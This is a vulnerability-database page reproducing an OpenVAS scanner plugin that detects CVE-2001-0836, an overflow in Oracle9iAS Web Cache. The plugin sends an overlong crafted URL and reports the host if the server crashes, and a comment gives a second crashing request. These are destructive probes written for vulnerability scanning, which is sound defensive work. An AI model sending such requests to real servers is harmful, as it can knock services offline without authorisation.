Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
openvasCopyright (C) 2002 Michel ArboiOPENVAS:136141256231011081
HistoryNov 03, 2005 - 12:00 a.m.

Oracle9iAS too long URL

2005-11-0300:00:00
Copyright (C) 2002 Michel Arboi
plugins.openvas.org
11

7.2 High

AI Score

Confidence

Low

0.018 Low

EPSS

Percentile

88.3%

JSON

It may be possible to make the Oracle9i application server crash
or execute arbitrary code by sending it a too long url specially crafted URL.

# SPDX-FileCopyrightText: 2002 Michel Arboi
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.11081");
  script_version("2023-07-21T05:05:22+0000");
  script_tag(name:"last_modification", value:"2023-07-21 05:05:22 +0000 (Fri, 21 Jul 2023)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/3443");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_cve_id("CVE-2001-0836");
  script_name("Oracle9iAS too long URL");
  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_copyright("Copyright (C) 2002 Michel Arboi");
  script_family("Gain a shell remotely");
  script_dependencies("gb_get_http_banner.nasl");
  script_mandatory_keys("Oracle/banner");
  script_require_ports("Services/www", 1100);

  script_tag(name:"summary", value:"It may be possible to make the Oracle9i application server crash
  or execute arbitrary code by sending it a too long url specially crafted URL.");

  script_tag(name:"affected", value:"Oracle9iAS Web Cache/2.0.0.1.0.");

  script_tag(name:"solution", value:"Upgrade your server.");

  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_analysis");

  exit(0);
}

include("http_func.inc");
include("port_service_func.inc");

port = http_get_port( default:1100 );

if( http_is_dead( port:port ) ) exit( 0 );

banner = http_get_remote_headers( port:port );

if( ! banner || "Oracle" >!< banner ) exit( 0 );

# Note: sending 'GET /<3571 x A> HTTP/1.0' will kill it too.
url = string( "/", crap( data:"A", length:3095 ), crap( data:"N", length:4 ) );

req = http_get( item:url, port:port );
res = http_send_recv( port:port, data:req );

if( http_is_dead( port:port, retry:4 ) ) {
  security_message( port:port );
  set_kb_item( name:"www/too_long_url_crash", value:TRUE );
  exit( 0 );
}

exit( 99 );

Related

openvas 4
cert 1
nessus 3
cve 1
cvelist 1
openvas
openvas
HTTP User-Agent overflow
2005-11-03 00:00:00
HTTP User-Agent Overflow DoS Vulnerability
2005-11-03 00:00:00
www too long url
2009-06-23 00:00:00
cert
cert
Oracle9iAS Web Cache vulnerable to buffer overflow
2001-10-25 00:00:00
nessus
nessus
Oracle Application Server Web Cache HTTP Request Overflow
2002-08-14 00:00:00
Web Server HTTP User-Agent Header Handling Remote Overflow
2002-08-13 00:00:00
Web Server Long URL Handling Remote Overflow DoS
1999-06-22 00:00:00
cve
cve
CVE-2001-0836
2001-12-06 05:00:00
cvelist
cvelist
CVE-2001-0836
2002-03-09 05:00:00

7.2 High

AI Score

Confidence

Low

0.018 Low

EPSS

Percentile

88.3%

JSON
Related for OPENVAS:136141256231011081
openvas4cert1nessus3cve1cvelist1